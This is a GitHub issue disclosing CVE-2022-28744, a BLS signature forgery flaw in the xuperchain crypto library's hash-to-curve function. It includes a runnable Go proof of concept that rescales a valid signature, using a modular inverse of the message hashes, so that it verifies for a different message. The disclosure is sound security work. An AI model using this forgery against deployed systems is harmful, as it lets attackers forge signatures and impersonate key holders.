Security issue

[k3mmio]

We would like to report a vulnerability in the crypto library.
Since there is no security policy mentioned for the repository, can you please forward any contact that we can use to disclose the vulnerability.
Not sure if the disclosure should be done straight in a public issue.

[k3mmio]

Bug Description:
It is possible to forge BLS signature.

Details:
The bug is in the hash-to-curve function hashToG1() https://github.com/xuperchain/crypto/blob/master/core/bls_sign/signature.go#L135
since the point on the curve is created by scalar multiplication of hash h for message m with the g1 generator:
S = (sk *h) x G1
an attacker can forge a signature S' for m':
S' = (sk * h') x G1 = (h'/h) x S
where the h'/h is the modular inverse over mod |G1|

Proof of Concept:

package main

import (
	"log"
	"math/big"
	"encoding/json"
	"github.com/xuperchain/crypto/client/service/xchain"
	"github.com/xuperchain/crypto/core/hash"
	bls12_381_ecc "github.com/consensys/gnark-crypto/ecc/bls12-381"
	"github.com/xuperchain/crypto/core/common"
)


func forgeSignature(msg1 []byte, msg2 []byte, sigPointG1 *bls12_381_ecc.G1Affine) *bls12_381_ecc.G1Affine {


	k := hash.HashUsingSha256(msg1)
	intK := new(big.Int).SetBytes(k)

	// |G1| = 52435875175126190479447740508185965837690552500527637822603658699938581184513
	m := new(big.Int)
	m.SetString("52435875175126190479447740508185965837690552500527637822603658699938581184513", 10)

	inverse  := new(big.Int).ModInverse(intK, m)

	k2 := hash.HashUsingSha256(msg2)
	intK2 := new(big.Int).SetBytes(k2)



	forged := new(big.Int).Mul(intK2,inverse)
	forged = new(big.Int).Mod(forged, m)


	return new(bls12_381_ecc.G1Affine).ScalarMultiplication(sigPointG1, forged)
}

func main() {
	xcc := new(xchain.XchainCryptoClient)


	msg := []byte("Welcome to the world of super chain using NIST.")
	msg2 := []byte("Nobody expects the Spanish inquisition!")

	privateKeyBLS, publicKeyBLS, err := xcc.GenerateBlsKeyPair()
	if err != nil {
		log.Printf("GenerateBlsKeyPair failed and err is: %v", err)
		return
	}

	blsSig, err := xcc.SignBls(privateKeyBLS, msg)
	log.Printf("BLS signature is %s and err is %v", blsSig, err)

	isSignatureMatch, err := xcc.VerifyBlsSig(publicKeyBLS, blsSig, msg)
	log.Printf("Verifying & Unmarshalling BLS signature, isSignatureMatch is %v and err is %v", isSignatureMatch, err)


	signature := new(common.BlsSignature)
	json.Unmarshal(blsSig, signature)

	sigPointG1 := new(bls12_381_ecc.G1Affine)
	sigPointG1.Unmarshal(signature.S)

	sigPoint2G1 := forgeSignature(msg, msg2, sigPointG1)


	blsSigForged := &common.BlsSignature{
		S: sigPoint2G1.Marshal(),
	}

	sigContentForged, _ := json.Marshal(blsSigForged)
	log.Printf("%s", sigContentForged)

	isSignatureMatch, err = xcc.VerifyBlsSig(publicKeyBLS, sigContentForged, msg2)
	log.Printf("Verifying & Unmarshalling BLS signature, isSignatureMatch is %v and err is %v", isSignatureMatch, err)
}

Run:

go run test.go

The reserved number for this bug is CVE-2022-28744